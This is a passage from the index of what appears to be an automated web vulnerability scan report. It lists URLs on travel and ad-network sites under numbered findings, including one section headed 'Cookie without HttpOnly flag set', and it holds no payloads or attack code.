13.163. http://www.hotels.com/hoteldetails/urgencypopup.html

13.164. http://www.hotels.com/html/blank.html

13.165. http://www.hotels.com/html/tealeaf.html

13.166. http://www.hotels.com/search.do

13.167. http://www.hotels.com/search/search.html

13.168. http://www.hotels.com/selectors/en_US/

13.169. http://www.orbitz.com/

13.170. http://www.orbitz.com/App/SubmitQuickSearch

13.171. http://www.orbitz.com/App/ViewDHTMLCalendar

13.172. http://www.orbitz.com/App/ViewFlightSearchResults

13.173. http://www.orbitz.com/shop/hotelsearch

13.174. http://www.tumri.net/ads/ads

13.175. http://www.wtp101.com/f

13.176. http://www.wtp101.com/pixel

13.177. http://www.wtp101.com/pull_sync

13.178. http://www.wtp101.com/push_sync

13.179. http://www9.effectivemeasure.net/v4/em_js

14. Cookie without HttpOnly flag set

14.1. http://ads.adxpose.com/ads/ads.js

14.2. http://afe.specificclick.net/

14.3. http://aon.com/

14.4. http://as00.estara.com/fs/rules.php

14.5. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

14.6. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

14.7. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

14.8. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

14.9. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js

14.10. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

14.11. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

14.12. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

14.13. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

14.14. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

14.15. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

14.16. http://event.adxpose.com/event.flow

14.17. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

14.18. http://go.americanexpress-travel.com/hotel/HotelCobrand.do

14.19. https://go.americanexpress-travel.com/SSOAuthenticateResponse.do

14.20. https://go.americanexpress-travel.com/hotel/HotelAvailability.do

14.21. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

14.22. http://hotelplanner.com/

14.23. http://hublotnation.com/

14.24. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0558b61c652f2b13814f52bc82b50bf69393c1a457279e848b07a1911a516b3c5b0f155e1e37d4bfcdb73f22fbbae1f4546cda0e6c6cad849f36658cf9e57a4a432696b3c3ea6bb4bc7804c87b2769f9be18cfe641678e007388419565df3ed541fbf040e1243ea7b1cf12b1770a9765b3d035afc4a953e9c49fcffb4ee7f07ffa381da8257cc19b37ba80954d6b50b545851b51d5f539f94b087c22c0c948bf761f57b35ca773cc0ecbd24bd8328933244419c47e2c04e61d9c9a59d0edff3f5083f655bd39a50f71a9229608c4a6030a7bd6c85a3eab3913a8b018a1e40fd4e25fa0d462aa0b4e876271bce66ac4023f636b6df4be60cdcaf4a16c3885cfc4b2cf7189fb10bee059f17c8072ce87259a372c95c8c6327ebe3729819bd538f65667f3b2cc5b293bbd5327d81a6fad9c885e9b4c2f552631cf3c3d9c2960d1712d7166b178602db44042574d152c040a0abb1e250b0380953e9617809313292370c313124feb2707e88333355247b7c7f429dc408c78aa0af2ab6497a8e3eb43913437e61e4ecb53412470479873d95bf90e918c91f4187cd197aba019e041da665f9d807cea325fad4ee60014c2ae16df5b10a3e6456628882750e21c52fd6a5ac67b5d1f9a1418e6bf3150c694228b1c4142b1b140ef59b10596ac2e7c8167a60b0a6ed5ad65cbb114cd9cbeaccb3640d2e1fb64f90285d2134ab0cb172c984a8995e3266f65c9e18d7d0ebebcc773c073900a79a04cb1c57f1fed100becaf6238b87a2d8781e5faf057e287d12375f35e77fa52bb308884c156037cb29c52512910c138b73201938b30474970c1f5cdfde9b00a144daf61af3e781f8ab7f56fa7bf68faf2886203f57dffb0413956a0708e81111278aa747faabeca91ec1066a0a87425dc07396d4a890f7c6276cb2ee1d19cb922585a219c127a0d90a383a7a48bb7fc0aaf59234a71f0e5f327141834709424ec184818828263f8b97440a976b1ab58cdc6d3c20d372204aa7abd1c2a51d73968327c7d38475612d449ead34a40fc73ed3fe5deba445c712a3e19ee2d55dab37a1c4c1dbdb1baa8a12f97dfa439a873e62e142e1d211d714a96cf4ec40b4b26817dbbe2540e3754f9efcd728f0058103bd70793ebde0588b7d1713a73bc54db8e581de98ae5fc1071670ee3d70a36b99e11f5a322b298a1d3996a8a14d64f643cc9db1da4399601ef2f28fccdc20f98b75283a4fdc863365d50ca86d5572203a2a3f0158531b746e650a991fa2fc8907725d7d6617a8167f610b62c2a901225bcfa9e850849f71c9d24aa9f1bb07118c2d7d1fa30d2f5afa5f0a9cdbe67264c494a4eaa082ea41f12d4484f63183fe587f06a9ed1fabe7aad6483964b6ed811b02dcd33d

14.25. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b34e13fc5045e2d98a069be11f8167050f8807b19d0c3f89cee5920595b5c06102533ba2e325817ebf4032d6106530f3b97c92b4f6e3e4359612ac322af65b42af52007fe3a2ae2e1a65aa10c520449f40a0b27eb0418a84600ec28c7be9662afd0584e35d9373f46daf655c8f115cc82f8c09cd39719abb36dc59c00fc279633b734891ffc4ebc13d6bc2e2bb92db9dfed8a8ae163e4de1dbd7d1cb554051a04b2a47dd17d2484164308345d55bcfc7d88a31c02b0444b93c621d2543fc71496b653ffda87966973320483e11103901c3881bce99a6b422be5f73883eb43913437e61e4ecb5341e5a1517ef7dd8ebcbf314c51f4187cd197aba019e1c1da665f9d80ed3a322e1dce4690e4f3de97bfca95d662b6a4e8fd4344f5c8879c9e4ef2b9efce3b901c370fc01046a077adfc21053525c5abafb4e000898f7cc495851aca6fb5aec12f60e4c8397fbdbba3b422e12b54a9834487952ac58c03bd8dbb5e2577005b409d849a2a4b3acce676f013e5df2cf539b1f07f6aed85dbcc4ad228f8cf28a7f440da651282427493b5837e322f47dbd598911423263c926c92318c00815dd25724b35ef037392091c5d88da9a57a412d1f74da3b580f6fd7c5dab2ca7dafb2d87223056daf90f1992685708e716157b88f514acfcecaf49c4003d0b82115796769084acc7abc6276fbee3484b9cc674d5ab4cc623f08a5d68392f40be29c2faa7d320b0793862444364c04b1e1312d4ccc7b16a627285c944098f6b1be3d9837734338673704af4ff8695b70964afc463dd8f8f233c34518bba5dea59d369c5aa49f5a5189040aafb91a68054aa3ea49691de9f56bab651b864e900cbcc726cbb15e1880bdb54fe6fa6be44e5e4641388b87511e0744b99ff812fa7508002ec727d6cbae0588d2c1612f43a951de3e58281c5fb5e91074126ea6a75a16cc8e24807672a29d5193bc8a8f44433f6119ecab6d81398371ef5a3d79cdf21fad6702b3a498e813965d00ef3625272753729385f0c0f18246e30049e1af2a880017759733244a9107a360a6997f7072a5ecda6ef00d791239f854af9aabf004cd52a781af35d7757a05b0f92dbe77930c396a7eaa1dfb343f32e44d6a16584af5b2a51a6bd17a9bafe871c6136a7f3cd5f9f5613fc69da81484206e5b368845d9caf38b88884a5df0a10b193cc028f0591

14.26. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50b86a91e9b6353178946a097073d9486f5d14d8ab9f851302212cf9503a8449876319d516c73b3d90ae0d29bc0835de176840861ac5d45a71d007dfff6a1784b71ad1997714bc707b1b015a25d99a71f7dc9c51eb42268ba4dd1b6038a168a01b2785eb5353cf22e8e0dcb2762a98c05fa67c02be8455b2a1619d4a784ba94573781a0ffe39ac6a487bfba043f44e5c1cdc68c0b1017c81f6a118600c65a052675c44bdb0af1f5f58a04f76a5644ea7a3443727981281f51504281da0b6a9c20781d240801556985d2479c8aaba32aa9567a8f21bd3f11477c6bf3e5be33075e1f1fe070d7fcc2f813dc1b5a92d77e13e144c04f08a97ef1ce0ecbbc23edc1f507660f70bd21e6a55d7b270421d49169024f816acff3fa30f99ba0ef409b0d99564129556bd4d7144847463dd3a00b434394b89a151513edb5e04d8a5cba1819c2c8a198fb221b7448f30e83351e477ae947e224c6c3bec3542a61f9599e42ce92bcd1c57448452c54bde75edd7c16a6e8db79cf93ed2b9bdbae8279455dac5178762d13390d33e176f278bc038f4c166a35cf74c92614960917de7470493bb30e23955f1c57dad89603f343d1a247fdb281f7aa2c57ac2ea2d2fe2d80723e068ca15a1a91665359e814127b8ef712faf1ecf81cc4046d5cd6420397269483ac95a9c6736fbeb91e4ac1c575d6fc1d9425f0845b6a6e2c1ee92bc5a6f6807bbd716b34464234964f121c49d59fc0ee6b6323d7cb155ade6441b08ad77c623a8571704da4add295f01023c88074c2d385753d295284be5bb24dd1698cb970b1e7529f4bfea689f78951a43fe7c8d0dcde1efb8a11fe78f94a9d8c6f69bb43ef801fd554b4799bac07a8f0224798a1731ab37247daf39678f650d751ed722a6ee8e50d8d2c1617f73ac14fbeb384dc9eac0494071276be6f76a73bcab34e5b607b71d51c36c6ada24063f4119bcde4dc409e651fa7aedd9cd727fa83717f3b4bdd813f63800cae67522a21332e685c0d021e703c60009f1ea2f38701205a706043fb1171645a6892f952255b9aaeb802d49e23c98718a9f4bb071a8c2a2719f2027557a2015890d9e1293ac1c7a4befcddbe46f3294982f03782fe5a2f56a3e849aabaf98a483e64ada7cf059c0a45f26cd58714160ee0e33cdb0a9dfc39b88285f4df0d0bfb8ad3f03e84eddc81edc15a237f08348b0aab3202610250980c

14.27. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75d5010d692ad89ce20478fdda038aa0753f64b07ead19d11caf50cd75a632df77193a62612b5e7c9d6078da4a8476d3242d68e02f406c22e308b5e346da5b9638fb1fee0e12cc51afe6f31a01c4cbd5a0209f0efba58311bf558a07114d307f7f748fe32ef946716ffb97bd82703eb0392e758af6bce57844146ac2a00fb7ec24a886926fde5779c1ea94b83273b2c7a5f8ef6c0e3c72a73d7a7e6da98efae9ffee804345fa58b8e969a10047c915a7047da5b9c185a7a68d15ecc4fa1bef3ad3eb2387f16a034397f686bf0705876365c85e46a7284672840374716385395c0199f9fa5b728b6562a8729b36f124d2a6bb9e1eb37005d1610bb7cd7e496f310de1c06938c7510ae46c64c59a47ffbc10fcfa02bfa8ee7600e4b35b37ba7fc462c3900299c926f1e4fd768cba5f430f8c6a5fa5f8d31a2475371537b8bc2440c580257b4b71e1c0084e78e420c14ede5ef1b8501e7461bdbc8b69be53457201ab44ec22f0b2a34aa0ab77ccb8ef89d0a3665f559cc4381d6edbcc72131066e0ef09c53cb1c07f6fdd10beeccfe748bdaa7892a170cac0d7c323253596d5a9417803bbf18d04d047f76a34f89344cc71d1dca266a4e3ce70729955e4a588ac59251f141d6fd46fdb980e0a92d5fae78abd3f124873f3756deaf09139d660d5df01701329f9b2eb8bcb8ff0dc9156811860854926d97d5aac3facc2c62beed5d54daa84f95ee47c134ab9e097e266b27826980f2be9222a77974314710359444121312d58692f96e7c649295431cc87e0fa2e5923b286fd9272354a6f68690ac077cd2d574978183706b2b038bbc59e348da2a95fd19a2b150d07bedb78ab5c301e02bf2cbc78c8458a2cb43f573ad17988d3e3de312b4851cd610a86ffdba4ae5e76741d2ba2612b17449cbfb8327f7038007ed762e6eece45f89781111f33f9718bae687dcc8fa5796061423bf6a72a03f98b11405647a2a8e1e38c4afa54737ae44c999b6db129c631bfff68fc88e77af85217d3e1cdb826a30d15ffd6c542526342e3d010a004d236435539b15f6a98957250c716744a5117a33096396fc052a5ac8aabd02879d7cccd54daba1b9034dd07c281ba45a7350a00c0c9dd7e7293294c4f8e6a1ddbf4ba12a4587a660d0ff012505a3e84aa6e6f9854f6c63f7f2c5079d5a11f168d38715024afeab05e43102

14.28. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75e4010c883f29dda6b0193c4ef67fb0912fa4b03e8dd8b40d2b455a54e7821f06486b72501acf4f0885cddaff2156f2d5adad553ea1ac27b31c311333ca1a47e8fb0aeb7e37a9e15f06133b60454ba4d766dfee1da533f35ec7b966610c010f2f054cd2afa88761deeaf7cbf4b2fec1687fa52935cd257806e69b32a03b566da5980642af3e6769f1fab519c223a2a7c4490f6c0e3d5247d86bde9ceacccbf88f5a21c2c09a38c9ed1941e797c935a3345970fca5b1b2774d756c14caba0b0ff4fb23a0f51e56179093f2a8d350e373328feb37070902c204a371316330fc89e1cd399b3ad39d8383eca7de72818567a76eefabc321e5a1517ef7dd8ebcbf314c90241f4b03351a216d1441dad65e4d469a2e766a297f5621b4b2ae170f5a84a73300d29cc8e68024f9c2e8caba07ab381baef3bed0d807376660c6b87910746493b15f8fb12415dd3af8f1d0e14e7a6ed5ad506e6434cdbcbbdccec645d291fb71fc02008282fb14bde3cdc99b9df5d757bf7559d4ddac4e7ac917c3004380ef7c857cb1d01f7adde5ebdc9f67080ddf58d2b1e5efc052a2029423c0e3ce776f178e65f8818406637ca22cb7344955c418920751b39e10720915a485cdadf9404a415daa24ff0e3d4faae2a5cfc7ea0d3af78d077315289ad5d13c53f540abb471578def215f9adb4f81cc100610d84145291229ed6ac95adcc263bb2e2481bc09574d7af19c12ea78f5b6a327b4bbb25c6aff1812eb47c6366124333924a1d4f4ed19e97b43e372285cd1257823f40b0ded3763f3bd0777f4df3f7d592f34073c88a76c086857e3c7d5184bb0ab019d02a90a91aa7ab45c014b8bed9bd023423f3

14.29. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0559961c04ff6b73c5ef264ce3454f322350b19450f01a37aa2582023bf1ea2a8ecba14b5a16f41e1d972e83dfcea631a09cdedb0e2d1cf1bf36b1fcc9d50b0e97c6c7f2771bda94ec18d418aa92f9995e0d7ff270578ff5c2998040d55e9ee160fb30b111242e37a04f7295178e6204b7f1f54e7598f7fc341f1c69ec74920ca9aa1f2a336fe1ee579fc545b83e9524f0947eb12134ed992f28acc7159ca99fd2bb61d45f71d5eb98ecc40d2ed52c74c055e86679bb50a24b3cee4c65a9ce0e04902473dade8348278a72c0b9d07377cf8ea11d7f5bbf18868c84ca4753db60f4fab47067ae6f4ae2e566da81dc021489552b5b01abe4fdbaf4f3bed995cef7c7ea25587e144a9168a01af6e6ca8280eb566da59976123f4e27a9d1aac489e383e2a785d95ffc9ebcf3e71c4e7be8bdf90f2d3a5b6083f4ee0cececa81041e15c81f7c08976ab71f417b27c45ddb48b6a2b6e250b3270f55e16f75083e249b321f2a264298ff3c25c5202b5b37060f2869afd35e90d2b3bb39b6497a8d21b23f1b4d7360ebfabc2c01455352b52b92a0d1e700b45917858c294bbb079c1212ab7efdc00fd0e67390dce619490a68a90dabe82c3e6c4523bbe2370e44903ec1fff26af491f3a80a8a30f117037707788fcc1c5c0e545bede61b1b5f83b28e140d41eab2e11d8b57b7124ad49abc9cb4645a2b4db844922e052a3fa45ce27b9080fd9d5b3f35a355ce4bd6debbbcc27738506f0ba79e08934a51f4abdd5be999a924dc8cf28c29405bf80125727f43370b60e421f42fb65b814a1037319a24cb7118940f44d02e754b3fb5002692544e0c8fdcc05bf447d1f54cf0b4d2f6fa2e5eab7ef6d2fa2e872533078eab591fc1660608ef17462cd9f445fdfee2ae179215751de5723ae413e5c4a1d6a6913776a484080cd69a7f84ff07952fa48a017e306b1ebe7897fcf3822ae0716932441531c4181a1a1ec184818828263f938b451d976b1ab58cdc6d3c20d37a7f48f5f980c7f34474938722c484d07360785fd1ed5db043df2991ac1ff1a04ec51daff296a1d301a337a3c7918c8f4dab8c15af2cfd449fda6b6cb311e68618d215ac6ca2bf10bfe3611788ee7015b2761bcbfb8d78a653d451b9752a3eb3b05dde2b4343a06a9748bfe5d3d999fe54900f1124be3e75f661cce54c016d7c29d8133993a5a21032a211cec0e6df46cc6e48f5f1d79bdf27ff85762a311e89853a66d55bae30542520607c390a59021e796565519f48f7f3880c270f7d6045a5417d365a6e9cf602200c9da6e950819f71cbd04da3f3be054bd67e261af3196b1ebe023d1774

14.30. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055b27ece43f6b67250d626c3324dfc5f24665e19610aff21f06f7771fc5585dd90b50aa6c8281c8ebd2ba97ac4f849060f9bf5a8a7978a5df974008bda0bbcdc493071284fadbe1b9ece4490b55e8bc9d291f7261065f9772a81190210a5df2d53b3093a1e5baf6e4ee0281a66a1200432074bc2539f7fc318bbe2aee8205ba4b993c3d818c00abe76ae154ac4be1e16444df65c4d12929eb19ccc370786dda475b94a1dba4d45e0d49d109ce11f81671825f00bbf913c3d8496ffde4bb1e6a37a34610386c5149849847672b9277865f2d62bc9bcacedbe7bcc01b57b25f75119f416553cf0f9e3382818c37ba75532e024d0cc67f455cbf5112b9bce05b92d3eab5ac2a255a919c446c40134ec755ef66acc0a80662af3e760920bba4deb34233b0b23e7af8080927a2990a6f8cc86f68cb9d3df724b2e85caa480cc5d524a85713650c145b71a5a7929c45ddb48a1a7bffa54b73e0852fe69740434298d340d36343feba83b21c070571c72474b280cd2d25888cdb3ad39d8103f9073ea6456062434f0e3b43706520b52b917d0e3b2bb5287572dc4981551aa05c13f7df265f2d453c4ab23acd8e53d5c1c37b274f0a94c7b385428c3963c1c47d3689cf3a53cf195a6fb0f8d64f0460d76037b8bcd46595e0551b9e719160185b58116091bebe7e7408454b343178f9ab6cfe562577f19b64e907c0f2b6eaa50b82e9b80ff985b6332a659cd4986d1bce8c7233c0d3e59f69003cf1904f4aeda59b59ef975dcd8a38c791f5aae5725292f453c5a33e575fa2ee60c8e4a1f6765ce21cf7514c20745d827764c69ee052396594c0dd8d8c657a54ed0a74ef4e484aaa82c5aab7da3ddf83e9d335131b0de6c6986641702ba040f3ce29b04b9a5b4bf15d106770e8317549a7695d5acc7e1c4266bb1ee4641c0cf26ceab199321a4850164327f56ec2fc5a8f18921bd706c2e45032e8322745e5e8eca81ed7d633fd7ce0e5e8a7212b38bd27a3f3b8e7b705bbdedecf9e0512b93912dd1d3c26b7b4639c7fb06a959d36991b51ef5a24bc71da3fb9cf69e55bc37eb8786d7de09eacb0aee15eb0780d3303fe70de0881cd74fba61e6bd10e2e63215d8be211ab5764ecdfe8c27f005d144a2314028feff49cc2f540fa135c148e2f38c9a99f45f96531521ed6f27a53ac8e71a05647b718d136d92aba34c33f5139ac8e7df17cd6f4ff7a58fca8a23ffd5727d3e4ad8d46e66810bab63577720342c6d080d061f22693154cb4ff8ac81002359706213af427a62063dc0ae05245f9eaaed0dd7c824cbd64eacf4ed034d802b7f4af409215bf10f0c92dce57232c793a3e6abdabf4ba22b4583f63180f95a2452a3ef19a7b1aed4406a32a1a1ca57995641a23bd2851b1653e7e46fd65dcffa3be2858ef8df5e51fc8a87f861d8ba8edbeb93527d2f08308f06b02e4c782d206e57f58b0cbc9813b96bf04fac7df0c06130f8d0385b04d12a96

14.31. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e5605a7f1b5afc5d9b38d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac53a16139211b0cb556cd69fb48a1dcba5d60771222daaf009b778966d228b012178fdd609edcf90d5924bf310972473f54a1ffc20583ba6b3c76a1733f00ac936579c56bdb60da65a9ef207789fc91bb93a6ca847c3b11dee47cf4582777ca82607b566da1ccb2577e7ff60f776ea0bc0772d236b5b8ef7c1e2c6306ac6e7b88fc498f8daaab51f3745e9cfd5c28b0d1116df17661c831bd959042170df5ec141aebdb6ee4da1566113a43522133d3e922a0e28352de9bb7b79913728403e1c15281ad2f97588dcfce239bd457a9c3ca7557d013f35a7f6b72001451715e97fd4ebcaf31add005285de6850bb18900d4dbe6beaa94189bc67bc88a5750e4331e67ae6a55d2f300c209e966a4d18d3699bf2f63ea793a2f40d8031a415567c002bdfc2155d585655b5e04e1c58d5e789155d17bdb2e54f8000b143498dcebecde1605e281ab74d927a082f6bf90ab82d9882aece0c3162f2099b49da80b9ef92723e536959fdc850cb4e07a2ae8f5bbb99fb74d8dba4897f1e5aa8062a237f493e0e64b07ef078b1038e4a1e3130cb25cf2319900c44de2f764c6bef0421955c4f5e8dd2c504a247d0f349a1e584f8ac7d0ffc7ef1dffb24897265558bae05139d380152ea441b7889a214f8f0ecfc1c9752605ad611539622c584a295ffc7203bbee24d48dadb32b7ce75e446d29e027e632d5af13eabe8b09e7bea262e721b4d2f96441e1d13cedcc2886e635096884c16f43354d3ce803f3443f42d6443b3aa8a9fa44673c2d67295d182706d2f5583be0aea42df2e90a24ef5f7499411aaf594f6d350a430a0cac08f8f1fa08a15f92baf469cd86763b117ee831bd843fb6bfcec42b7e6694189b52213b37c18caff862fa7018105b92a263ab9e60f8b294246f039914cbee6d7decfab539f554220b53b23a13fcbe41e026c2c7e884f68c4aaf14d37a74195c1e1d81799604df4aed9cad925ad8a732f3a49dcd23e31da0ffa645420703b2e6e0f0e024e206e6307ca14f2a980042409206415ff162d62063a86e3414c1f8cb1e15bd2cc689d8a1aacabac0f0bd22d7a4ca40c2451a6000d97dfb62964c0c0a5e8bac6f60f020ab845

